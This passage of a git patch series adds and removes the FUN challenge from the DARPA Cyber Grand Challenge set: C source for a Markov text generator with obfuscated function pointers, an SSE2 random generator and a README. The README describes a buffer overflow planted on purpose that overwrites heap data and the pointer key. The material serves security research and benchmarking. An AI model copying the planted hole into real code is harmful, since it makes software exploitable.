'.'; + tmp[i++] = '.'; + } + else + { + tmp[i++] = '.'; + } + tmp[i++] = 0; + return CALL(STRDUP, tmp); +} + +static void cgc_my_analyze_text(htbl_t *tbl, const char *text) +{ + char word[64], prev[64]; + uintptr_t next_tbl; + const char *s; + + prev[0] = 0; + for (s = text; *s != 0; ) + { + const char *start, *end; + int has_period = 0; + + while (*s != 0 && CALL(IS_ALPHA, *s) == 0) + s++; + if (*s == 0) break; + + start = s; + while (*s != 0 && CALL(IS_ALPHA, *s) != 0) + s++; + end = s; + + if (end-start >= sizeof(word)) + continue; + + while (*s != 0 && CALL(IS_ALPHA, *s) == 0) + { + if (*s++ == '.') + { + has_period = 1; + break; + } + } + + CALL(MEMCPY, word, start, end-start); + word[end-start] = 0; + CALL(TO_LOWER, word); + +add_next_word: + next_tbl = CALL(HTBL_GET, tbl, prev); + if (next_tbl == 0) + { + next_tbl = CALL(CALLOC, 1, sizeof(htbl_t)); + if (next_tbl == 0) + continue; + CALL(HTBL_INIT, next_tbl, 8); + CALL(HTBL_SET, tbl, prev, next_tbl); + } + CALL(HTBL_SET, next_tbl, word, CALL(HTBL_GET, next_tbl, word) + 1); + + CALL(STRCPY, prev, word); + if (has_period) + { + has_period = 0; + word[0] = 0; + goto add_next_word; + } + } + + if (word[0] != 0) + { + word[0] = 0; + next_tbl = CALL(HTBL_GET, tbl, prev); + if (next_tbl == 0) + { + next_tbl = CALL(CALLOC, 1, sizeof(htbl_t)); + if (next_tbl == 0) + return; + CALL(HTBL_INIT, next_tbl, 8); + CALL(HTBL_SET, tbl, prev, next_tbl); + } + CALL(HTBL_SET, next_tbl, word, CALL(HTBL_GET, next_tbl, word) + 1); + } +} + +static void cgc_my_write_error(uintptr_t value) +{ + CALL(WRITE_UINT, value); +} + +static void cgc_my_write_uint(uintptr_t value) +{ + uint8_t tmp[sizeof(value) + 1]; + int to_send; + cgc_size_t bytes; + + if (value < 0x80) + { + tmp[0] = value; + to_send = 1; + } + else if (value < 0x7F00) + { + tmp[0] = 0x80 | (value >> 8); + tmp[1] = value; + to_send = 2; + } + else + { + tmp[0] = 0xFF; + *(uintptr_t *)&tmp[1] = value; + to_send = 1 + sizeof(uintptr_t); + } + + cgc_transmit(STDOUT, tmp, to_send, &bytes); +} + +static void cgc_my_write_string(const char *s) +{ + uintptr_t len = CALL(STRLEN, s); + cgc_size_t bytes; + CALL(WRITE_UINT, len); + cgc_transmit(STDOUT, s, len, &bytes); +} + +static uintptr_t cgc_my_read_all(char *buf, uintptr_t len) +{ + cgc_size_t bytes; + while (len > 0) + { + if (cgc_receive(STDIN, buf, len, &bytes) != 0 || bytes == 0) + return 0; + buf += bytes; + len -= bytes; + } + return 1; +} + +static intptr_t cgc_my_read_uint(uintptr_t *pvalue) +{ + uintptr_t value; + uint8_t byte; + if (!CALL(READ_ALL, &byte, 1)) + return 0; + + if (byte < 0x80) + { + value = byte; + } + else if (byte < 0xFF) + { + uint8_t byte2; + if (!CALL(READ_ALL, &byte2, 1)) + return 0; + value = ((byte & 0x7F) << 8) | byte2; + } + else + { + if (!CALL(READ_ALL, &value, sizeof(value))) + return 0; + } + + *pvalue = value; + return 1; +} + +static intptr_t cgc_my_read(char *buf, intptr_t max) +{ + uintptr_t rlen; + + if (!CALL(READ_UINT, &rlen)) + return -1; + + if (rlen > max) + return -1; + + if (!CALL(READ_ALL, buf, rlen)) + return -1; + + return rlen; +} + +static intptr_t cgc_my_read_string(char *buf, intptr_t max) +{ + intptr_t actual; + if (max == 0) + return 0; + actual = CALL(READ, buf, max-1); + if (actual < 0) + return actual; + buf[actual] = 0; + return actual; +} + +static void cgc_my_protect(uintptr_t new_key) +{ + cgc_size_t i; + for (i = 0; i < FUNCS_END; i++) + *(uintptr_t *)(&funcs[i]) += new_key - secret_key; + secret_key = new_key; +} + +static void cgc_my_init() +{ + secret_key = STATIC_SECRET_KEY; +} + +int main(int cgc_argc, char *cgc_argv[]) +{ + uintptr_t cmd, value; + char buf[32], *tmp; + htbl_t tbl; + + CALL(INIT, 0); + CALL(PROTECT, 0xDEADBEEF); + + CALL(HTBL_INIT, &tbl, 128); + CALL(ANALYZE_TEXT, &tbl, cgc_text); + + while (1) + { + if (!CALL(READ_UINT, &cmd)) + break; + + if (cmd == CMD_QUIT) + { + CALL(WRITE_ERROR, ERROR_OK); + break; + } + + switch (cmd) + { + case CMD_REPROTECT: + if (CALL(READ_UINT, &value)) + { + CALL(PROTECT, value); + CALL(WRITE_ERROR, ERROR_OK); + } + else + { + CALL(WRITE_ERROR, ERROR_INVAL); + } + break; + case CMD_ADD_WORD: + if ((intptr_t)CALL(READ_STRING, buf, sizeof(buf)) >= 0) + { + if (CALL(ADD_WORD, buf)) + CALL(WRITE_ERROR, ERROR_OK); + else + CALL(WRITE_ERROR, ERROR_INVAL); + } + else + { + CALL(WRITE_ERROR, ERROR_INVAL); + } + break; + case CMD_SORT_WORDS: + if (CALL(READ_UINT, &value)) + { + CALL(SORT_WORDS, STRCMP, value); + CALL(WRITE_ERROR, ERROR_OK); + } + else + { + CALL(WRITE_ERROR, ERROR_INVAL); + } + break; + case CMD_SEARCH_PARTIAL: + case CMD_SEARCH_WORD: + if ((intptr_t)CALL(READ_STRING, buf, sizeof(buf)) >= 0) + { + intptr_t idx = CALL(SEARCH_WORDS, buf, cmd == CMD_SEARCH_PARTIAL); + if (idx < 0) + { + CALL(WRITE_ERROR, ERROR_NOTFOUND); + } + else + { + CALL(WRITE_ERROR, ERROR_OK); + CALL(WRITE_UINT, (uintptr_t)idx); + } + } + else + { + CALL(WRITE_ERROR, ERROR_INVAL); + } + break; + case CMD_GENERATE_TEXT: + tmp = CALL(GENERATE_TEXT, &tbl, 0); + if (tmp != NULL) + { + CALL(WRITE_ERROR, ERROR_OK); + CALL(WRITE_STRING, tmp); + CALL(FREE, tmp); + } + else + { + CALL(WRITE_ERROR, ERROR_NOMEM); + } + break; + case CMD_TRAINING: + tmp = NULL; + do { + CALL(FREE, tmp); + tmp = CALL(GENERATE_TEXT, &tbl, 1); + if (tmp == NULL) + break; + } while (CALL(STRLEN, tmp) < 3 || tmp[CALL(STRLEN, tmp)-2] == '.'); + if (tmp != NULL) + { + uintptr_t add_text = 0; + CALL(WRITE_ERROR, ERROR_OK); + CALL(WRITE_STRING, tmp); + if (CALL(READ_UINT, &add_text) && add_text) + CALL(ANALYZE_TEXT, &tbl, tmp); + CALL(FREE, tmp); + CALL(WRITE_ERROR, ERROR_OK); + } + else + { + CALL(WRITE_ERROR, ERROR_NOMEM); + } + break; + default: + /* ignore invalid commands */ + break; + } + } + + return 0; +} + +funptr_t funcs[] = { + [INIT] = (funptr_t) cgc_my_init, +#define REGISTER(x, y) [x] = (funptr_t) ((uintptr_t)(y) + STATIC_SECRET_KEY) + REGISTER(PROTECT, cgc_my_protect), + REGISTER(STRLEN, cgc_my_strlen), + REGISTER(STRNCMP, cgc_my_strncmp), + REGISTER(STRCMP, cgc_my_strcmp), + REGISTER(STRCPY, cgc_my_strcpy), + REGISTER(MEMCPY, cgc_my_memcpy), + REGISTER(BYTECMP, cgc_my_bytecmp), + REGISTER(SEARCH_WORDS, cgc_my_search_words), + REGISTER(SORT_WORDS, cgc_my_sort_words), + REGISTER(ADD_WORD, cgc_my_add_word), + REGISTER(VERIFY_WORD, cgc_my_verify_word), + REGISTER(RANDOM_DICT_WORD, cgc_my_random_dict_word), + REGISTER(ANALYZE_TEXT, cgc_my_analyze_text), + REGISTER(GENERATE_TEXT, cgc_my_generate_text), + REGISTER(STRNCPY, cgc_my_strncpy), + REGISTER(PRINTF, cgc_fdprintf), + REGISTER(STRDUP, cgc_my_strdup), + REGISTER(CALLOC, cgc_calloc), + REGISTER(FREE, cgc_free), + REGISTER(HASH_STRING, cgc_my_hash_string), + REGISTER(HTBL_INIT, cgc_my_htbl_init), + REGISTER(HTBL_ENLARGE, cgc_my_htbl_enlarge), + REGISTER(HTBL_GET, cgc_my_htbl_get), + REGISTER(HTBL_SET, cgc_my_htbl_set), + REGISTER(HTBL_FREE, cgc_my_htbl_free), + REGISTER(HTBL_FIRST, cgc_my_htbl_first), + REGISTER(HTBL_NEXT, cgc_my_htbl_next), + REGISTER(IS_ALPHA, cgc_isalpha), + REGISTER(TO_LOWER, cgc_my_to_lower), + REGISTER(RANDOM_WORD, cgc_my_random_word), + REGISTER(RANDINT, cgc_my_randint), + REGISTER(READ_ALL, cgc_my_read_all), + REGISTER(READ_UINT, cgc_my_read_uint), + REGISTER(READ, cgc_my_read), + REGISTER(READ_STRING, cgc_my_read_string), + REGISTER(WRITE_UINT, cgc_my_write_uint), + REGISTER(WRITE_ERROR, cgc_my_write_error), + REGISTER(WRITE_STRING, cgc_my_write_string) +}; diff --git a/exclude/FUN/src/tornado.c b/exclude/FUN/src/tornado.c new file mode 100644 index 000000000..e70429e95 --- /dev/null +++ b/exclude/FUN/src/tornado.c @@ -0,0 +1,115 @@ +/* + * Copyright (c) 2015 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ +#include "cgc_stdint.h" + +#define M 122 +#define N 156 + +/* from gcc headers */ +typedef long long _m128i __attribute__((__vector_size__(16))); +inline _m128i _mm_slli_si128(_m128i a, uint8_t b) { + __asm__ volatile ( "pslldq %1, %0" : "+x" (a) : "i" (b) ); + return a; +} + +inline _m128i _mm_srli_si128(_m128i a, uint8_t b) { + __asm__ volatile ( "psrldq %1, %0" : "+x" (a) : "i" (b) ); + return a; +} + +inline _m128i _mm_slli_epi32(_m128i a, uint8_t b) { + __asm__ volatile ( "pslld %1, %0" : "+x" (a) : "i" (b) ); + return a; +} + +inline _m128i _mm_srli_epi32(_m128i a, uint8_t b) { + __asm__ volatile ( "psrld %1, %0" : "+x" (a) : "i" (b) ); + return a; +} + + +static int initialized = 0; +static int available_bytes; +static unsigned idx; +static _m128i W[N]; +const static _m128i MASK = {0xBFFFFFF6BFFAFFFF, 0xDDFECB7FDFFFFFEF}; + +void cgc_tornado_mix() +{ + int i; + _m128i g, wA, wB, wC, wD, tmp; + + // generate g + wA = W[idx]; + wB = W[(idx + M) % N]; + wC = W[(idx + N-2) % N]; + wD = W[(idx + N-1) % N]; + + wA = _mm_slli_si128(wA, 1) ^ wA; + wB = _mm_srli_epi32(wB, 11) & MASK; + wC = _mm_srli_si128(wC, 1); + wD = _mm_slli_epi32(wD, 18); + + g = W[idx] ^ wA ^ wB ^ wC ^ wD; + + // shift in g + W[0] = g; + idx = (idx + 1) % N; + + available_bytes = N * 4; +} + +void cgc_tornado_init() +{ + int i; + uint32_t seed = 0x12345678; + uint32_t *W32 = (uint32_t *)W; + + initialized = 1; + available_bytes = 0; + idx = 0; + + for (i = 0; i < N * 4; i++) + { + seed *= 0xdeadbeef; + seed += 0xabcdef1c; + W32[i] = seed; + } + + for (i = 0; i < 1000; i++) + cgc_tornado_mix(); +} + +uint32_t cgc_tornado() +{ + uint32_t result; + if (!initialized) + cgc_tornado_init(); + + if (available_bytes < sizeof(uint32_t)) + cgc_tornado_mix(); + + result = *(uint32_t *)W + N * 4 - available_bytes/4; + available_bytes -= sizeof(uint32_t); + return result; +} From 5d31532eac9bf5dd64549f4be866b48878834a46 Mon Sep 17 00:00:00 2001 From: dns43 Date: Mon, 14 Oct 2019 02:30:44 -0400 Subject: [PATCH 4/6] fix typo --- challenges/Blubber/CMakeLists.txt | 2 +- challenges/FUN/CMakeLists.txt | 7 - challenges/FUN/README.md | 37 - challenges/FUN/lib/calloc.c | 46 - challenges/FUN/lib/cgc_ctype.h | 16 - challenges/FUN/lib/cgc_malloc.h | 53 - challenges/FUN/lib/cgc_stdarg.h | 15 - challenges/FUN/lib/cgc_stddef.h | 17 - challenges/FUN/lib/cgc_stdint.h | 42 - challenges/FUN/lib/cgc_stdlib.h | 29 - challenges/FUN/lib/cgc_string.h | 24 - challenges/FUN/lib/ctype.c | 143 - challenges/FUN/lib/free.c | 51 - challenges/FUN/lib/malloc.c | 143 - challenges/FUN/lib/malloc_common.c | 127 - challenges/FUN/lib/memchr.c | 39 - challenges/FUN/lib/memcmp.c | 36 - challenges/FUN/lib/memcpy.c | 38 - challenges/FUN/lib/memmove.c | 45 - challenges/FUN/lib/memset.c | 42 - challenges/FUN/lib/printf.c | 261 - challenges/FUN/lib/realloc.c | 55 - challenges/FUN/lib/strcasecmp.c | 39 - challenges/FUN/lib/strcat.c | 32 - challenges/FUN/lib/strchr.c | 43 - challenges/FUN/lib/strcmp.c | 37 - challenges/FUN/lib/strcpy.c | 36 - challenges/FUN/lib/strdup.c | 12 - challenges/FUN/lib/strlen.c | 36 - challenges/FUN/lib/strncasecmp.c | 45 - challenges/FUN/lib/strncmp.c | 41 - challenges/FUN/lib/strncpy.c | 17 - challenges/FUN/lib/strsep.c | 47 - challenges/FUN/lib/strtol.c | 127 - .../FUN/poller/for-release/POLL_00001.xml | 33 - .../FUN/poller/for-testing/POLL_00001.xml | 11 - challenges/FUN/poller/for-testing/machine.py | 11853 ---------------- .../FUN/poller/for-testing/state-graph.yaml | 44 - challenges/FUN/pov_1/pov.c | 2259 --- challenges/FUN/src/cgc_text.h | 289 - challenges/FUN/src/cgc_words_r.h | 11738 --------------- challenges/FUN/src/main.c | 936 -- challenges/FUN/src/tornado.c | 115 - 43 files changed, 1 insertion(+), 29057 deletions(-) delete mode 100644 challenges/FUN/CMakeLists.txt delete mode 100644 challenges/FUN/README.md delete mode 100644 challenges/FUN/lib/calloc.c delete mode 100644 challenges/FUN/lib/cgc_ctype.h delete mode 100644 challenges/FUN/lib/cgc_malloc.h delete mode 100644 challenges/FUN/lib/cgc_stdarg.h delete mode 100644 challenges/FUN/lib/cgc_stddef.h delete mode 100644 challenges/FUN/lib/cgc_stdint.h delete mode 100644 challenges/FUN/lib/cgc_stdlib.h delete mode 100644 challenges/FUN/lib/cgc_string.h delete mode 100644 challenges/FUN/lib/ctype.c delete mode 100644 challenges/FUN/lib/free.c delete mode 100644 challenges/FUN/lib/malloc.c delete mode 100644 challenges/FUN/lib/malloc_common.c delete mode 100644 challenges/FUN/lib/memchr.c delete mode 100644 challenges/FUN/lib/memcmp.c delete mode 100755 challenges/FUN/lib/memcpy.c delete mode 100644 challenges/FUN/lib/memmove.c delete mode 100755 challenges/FUN/lib/memset.c delete mode 100644 challenges/FUN/lib/printf.c delete mode 100644 challenges/FUN/lib/realloc.c delete mode 100644 challenges/FUN/lib/strcasecmp.c delete mode 100644 challenges/FUN/lib/strcat.c delete mode 100644 challenges/FUN/lib/strchr.c delete mode 100644 challenges/FUN/lib/strcmp.c delete mode 100644 challenges/FUN/lib/strcpy.c delete mode 100644 challenges/FUN/lib/strdup.c delete mode 100755 challenges/FUN/lib/strlen.c delete mode 100644 challenges/FUN/lib/strncasecmp.c delete mode 100644 challenges/FUN/lib/strncmp.c delete mode 100644 challenges/FUN/lib/strncpy.c delete mode 100644 challenges/FUN/lib/strsep.c delete mode 100644 challenges/FUN/lib/strtol.c delete mode 100644 challenges/FUN/poller/for-release/POLL_00001.xml delete mode 100644 challenges/FUN/poller/for-testing/POLL_00001.xml delete mode 100644 challenges/FUN/poller/for-testing/machine.py delete mode 100644 challenges/FUN/poller/for-testing/state-graph.yaml delete mode 100644 challenges/FUN/pov_1/pov.c delete mode 100644 challenges/FUN/src/cgc_text.h delete mode 100644 challenges/FUN/src/cgc_words_r.h delete mode 100644 challenges/FUN/src/main.c delete mode 100644 challenges/FUN/src/tornado.c diff --git a/challenges/Blubber/CMakeLists.txt b/challenges/Blubber/CMakeLists.txt index fc2b7db89..27054fb0c 100644 --- a/challenges/Blubber/CMakeLists.txt +++ b/challenges/Blubber/CMakeLists.txt @@ -1,6 +1,6 @@ add_compile_options( -fno-exceptions -fno-rtti -DCPLUSPLUS ) set( SERVICE_ID "00111" ) set( AUTHOR_ID "KPRCA" ) -add_compile_options( -O1 -g -fpermissive -fmsextensions) +add_compile_options( -O1 -g -fpermissive -fms-extensions) set( VULN_COUNT "1" ) buildCB() diff --git a/challenges/FUN/CMakeLists.txt b/challenges/FUN/CMakeLists.txt deleted file mode 100644 index 17ce3212d..000000000 --- a/challenges/FUN/CMakeLists.txt +++ /dev/null @@ -1,7 +0,0 @@ -set( POLLS_TESTING_COUNT "1000" ) -set( POLLS_TESTING_SEED "12798375" ) -set( POLLS_RELEASE_SEED "1651425667" ) -add_compile_options( -O3 -g -msse2 ) -set( SERVICE_ID "00044" ) -set( AUTHOR_ID "KPRCA" ) -buildCB() diff --git a/challenges/FUN/README.md b/challenges/FUN/README.md deleted file mode 100644 index 156b1d9d3..000000000 --- a/challenges/FUN/README.md +++ /dev/null @@ -1,37 +0,0 @@ -# KPRCA-00044 (FUN) - -### DARPA performer group -Kaprica Security (KPRCA) - -## Description: - -This service implements a simple text generator based on a Markov process. The initial states are built using static text from the great essayist Jonathan Swift. Additional states can be introduced by training, during which the service will generate text using the current states and an included dictionary, and if the user approves, the text will be added to the states. - -### Feature List - -As an ultra-secure service, attempts to exploit this service will fail because of its novel function pointer protection (FUNpro). Additionally, the text generation uses an advanced RNG that makes use of the latest in processor technologies (SSE2). - -The available commands are: - - * Reprotect - FUNpro! - * Add word - add a word to the internal dictionary - * Sort words - sort the internal dictionary - * Search words - search through the dictionary for a word or partial word - * Generate text - generates text randomly using the current states - * Training - add new states via a machine learning procedure - -## Vulnerability - -The vulnerability is a buffer overflow of an array of strings in the *.data* section (*words*). The binary fails to check the length of the array when adding new strings to the end of the array (*main.c:421*). By overflowing the array, the attack is able to overwrite data used by *malloc* and eventually the *secret_key* which is used to unobfuscate function pointers. - -### Generic class of vulnerability -Buffer overflow - -### CWE classification -CWE-788: Access of Memory Location After End of Buffer - -## Challenges - -This challenge set implements a service with a minimum of direct function calls. Instead, almost all of the function calls from *main.c* are indirect calls through an array of obfuscated function pointers. These function pointers are obfuscated at compile time by adding a constant value to the pointers, and can be reobfuscated at run-time by the user. This will pose a challenge from static analysis of the challenge binary. - -Additionally, in order to trigger the buffer overflow the attack must be able to add many valid words to the dictionary. When adding a new word, the service checks that the word does not already exist in the dictionary and that the word partially matches another word in the dictionary. This will post a challenge for trivial fuzzing attempts, but should be easy for symbolic execution. However, if incorrect paths are taken, the solver will need to handle SSE and SSE2 instructions. diff --git a/challenges/FUN/lib/calloc.c b/challenges/FUN/lib/calloc.c deleted file mode 100644 index 5f90fdc1c..000000000 --- a/challenges/FUN/lib/calloc.c +++ /dev/null @@ -1,46 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_stdlib.h" -#include "cgc_string.h" - -void *cgc_calloc(cgc_size_t nmemb, cgc_size_t size) -{ - if (nmemb == 0 || size == 0) - return NULL; - - cgc_size_t tot = nmemb * size; - - // Overflow - if (tot / size != nmemb) - return NULL; - - void *ptr = cgc_malloc(tot); - if (ptr == NULL) - return NULL; - - return cgc_memset(ptr, 0, tot); -} diff --git a/challenges/FUN/lib/cgc_ctype.h b/challenges/FUN/lib/cgc_ctype.h deleted file mode 100644 index c0f04001d..000000000 --- a/challenges/FUN/lib/cgc_ctype.h +++ /dev/null @@ -1,16 +0,0 @@ -#ifndef CTYPE_H_ -#define CTYPE_H_ - -int cgc_isdigit(int c); -int cgc_isascii(int c); -int cgc_isprint(int c); -int cgc_isalnum(int c); -int cgc_isalpha(int c); -int cgc_islower(int c); -int cgc_isupper(int c); -int cgc_isspace(int c); -int cgc_ispunct(int c); -int cgc_tolower(int c); -int cgc_toupper(int c); - -#endif /* !CTYPE_H_ */ diff --git a/challenges/FUN/lib/cgc_malloc.h b/challenges/FUN/lib/cgc_malloc.h deleted file mode 100644 index 22353bc71..000000000 --- a/challenges/FUN/lib/cgc_malloc.h +++ /dev/null @@ -1,53 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#ifndef MALLOC_COMMON_H -#define MALLOC_COMMON_H - -#include "cgc_stdint.h" - -#define NUM_FREE_LISTS 32 -#define HEADER_PADDING 24 -#define NEW_CHUNK_SIZE 262144 -#define ALIGNMENT 8 - -extern struct blk_t *cgc_free_lists[NUM_FREE_LISTS]; -extern cgc_size_t size_class_limits[NUM_FREE_LISTS]; - -struct blk_t { - cgc_size_t size; - unsigned int free; - struct blk_t *fsucc; - struct blk_t *fpred; - struct blk_t *next; - struct blk_t *prev; -}; - -void cgc_coalesce(struct blk_t *); -int cgc_get_size_class(cgc_size_t size); -void cgc_insert_into_flist(struct blk_t *blk); -void cgc_remove_from_flist(struct blk_t *blk); - -#endif /* MALLOC_COMMON_H */ diff --git a/challenges/FUN/lib/cgc_stdarg.h b/challenges/FUN/lib/cgc_stdarg.h deleted file mode 100644 index 8f66d4681..000000000 --- a/challenges/FUN/lib/cgc_stdarg.h +++ /dev/null @@ -1,15 +0,0 @@ -#ifndef STDARG_H_ -#define STDARG_H_ - -#ifdef WIN -#include -#else -typedef __builtin_va_list __gnuc_va_list; -#define va_start(v,l) __builtin_va_start(v,l) -#define va_end(v) __builtin_va_end(v) -#define va_arg(v,l) __builtin_va_arg(v,l) - -typedef __gnuc_va_list va_list; -#endif - -#endif /* !STDARG_H_ */ diff --git a/challenges/FUN/lib/cgc_stddef.h b/challenges/FUN/lib/cgc_stddef.h deleted file mode 100644 index 56c1ea51d..000000000 --- a/challenges/FUN/lib/cgc_stddef.h +++ /dev/null @@ -1,17 +0,0 @@ -#ifndef STDDEF_H_ -#define STDDEF_H_ - -#define PAGE_SIZE 4096 - -typedef long int ptrdiff_t; - -#ifndef _LIBCGC_H - typedef long unsigned int cgc_size_t; - typedef long int cgc_ssize_t; - - #define NULL 0 -#endif - -#define offsetof(TYPE, MEMBER) __builtin_offsetof (TYPE, MEMBER) - -#endif /* !STDDEF_H_ */ diff --git a/challenges/FUN/lib/cgc_stdint.h b/challenges/FUN/lib/cgc_stdint.h deleted file mode 100644 index 56b0258b8..000000000 --- a/challenges/FUN/lib/cgc_stdint.h +++ /dev/null @@ -1,42 +0,0 @@ -#ifndef STDINT_H_ -#define STDINT_H_ - -typedef signed char int8_t; -typedef short int int16_t; -typedef int int32_t; -typedef long long int int64_t; - -typedef unsigned char uint8_t; -typedef unsigned short int uint16_t; -typedef unsigned int uint32_t; -typedef unsigned long long int uint64_t; - -typedef int intptr_t; -typedef unsigned int uintptr_t; - -# define __INT64_C(c) c ## LL -# define __UINT64_C(c) c ## ULL -/* Limits of integral types. */ - -/* Minimum of signed integral types. */ -# define INT8_MIN (-128) -# define INT16_MIN (-32767-1) -# define INT32_MIN (-2147483647-1) -# define INT64_MIN (-__INT64_C(9223372036854775807)-1) -# define INT_MIN INT32_MIN - -/* Maximum of signed integral types. */ -# define INT8_MAX (127) -# define INT16_MAX (32767) -# define INT32_MAX (2147483647) -# define INT64_MAX (__INT64_C(9223372036854775807)) -# define INT_MAX INT32_MAX - -/* Maximum of unsigned integral types. */ -# define UINT8_MAX (255) -# define UINT16_MAX (65535) -# define UINT32_MAX (4294967295U) -# define UINT64_MAX (__UINT64_C(18446744073709551615)) -# define UINT_MAX UINT32_MAX - -#endif /* !STDINT_H_ */ diff --git a/challenges/FUN/lib/cgc_stdlib.h b/challenges/FUN/lib/cgc_stdlib.h deleted file mode 100644 index 675e789ee..000000000 --- a/challenges/FUN/lib/cgc_stdlib.h +++ /dev/null @@ -1,29 +0,0 @@ -#ifndef STDLIB_H_ -#define STDLIB_H_ - -#include "libcgc.h" -#include "cgc_stdarg.h" -#include "cgc_stddef.h" - -#define isinf(x) __builtin_isinf(x) -#define isnan(x) __builtin_isnan(x) - -extern int cgc_fdprintf(int fd, const char *fmt, ...); -extern int cgc_sprintf(char *s, const char *fmt, ...); -#define cgc_printf(...) fdprintf(STDOUT, __VA_ARGS__) - -long cgc_strtol(const char *str, char **endptr, int base); -unsigned long strtoul(const char *str, char **endptr, int base); - -extern void *cgc_malloc(cgc_size_t size); -extern void *cgc_calloc(cgc_size_t nmemb, cgc_size_t size); -extern void *cgc_realloc(void *ptr, cgc_size_t size); -extern void cgc_free(void *ptr); -extern cgc_size_t malloc_size(void *ptr); - -static void cgc_exit(int ret) -{ - cgc__terminate(ret); -} - -#endif /* !STDLIB_H_ */ diff --git a/challenges/FUN/lib/cgc_string.h b/challenges/FUN/lib/cgc_string.h deleted file mode 100644 index 85f0e7010..000000000 --- a/challenges/FUN/lib/cgc_string.h +++ /dev/null @@ -1,24 +0,0 @@ -#ifndef STRING_H_ -#define STRING_H_ - -#include "cgc_stddef.h" - -extern void *cgc_memcpy(void *dest, const void *src, cgc_size_t n); -extern void *cgc_memmove(void *dest, const void *src, cgc_size_t n); -extern void *cgc_memset(void *dest, int c, cgc_size_t n); -extern int memcmp(void *s1, const void *s2, cgc_size_t n); -extern void *memchr(const void *s, int c, cgc_size_t n); - -extern cgc_size_t cgc_strlen(const char *s); -extern char *cgc_strcpy(char *dest, const char *src); -extern char *cgc_strncpy(char *dest, const char *src, cgc_size_t n); -extern char *cgc_strchr(const char *s, int c); -extern char *cgc_strsep(char **stringp, const char *delim); -extern int strcmp(const char *s1, const char *s2); -extern int strncmp(const char *s1, const char *s2, cgc_size_t n); -extern int strcasecmp(const char *s1, const char *s2); -extern int strncasecmp(const char *s1, const char *s2, cgc_size_t n); -extern char *cgc_strcat(char *dest, const char *src); -extern char *cgc_strdup(const char *src); - -#endif /* !STRING_H_ */ diff --git a/challenges/FUN/lib/ctype.c b/challenges/FUN/lib/ctype.c deleted file mode 100644 index abbcdaf79..000000000 --- a/challenges/FUN/lib/ctype.c +++ /dev/null @@ -1,143 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "cgc_ctype.h" - -#define 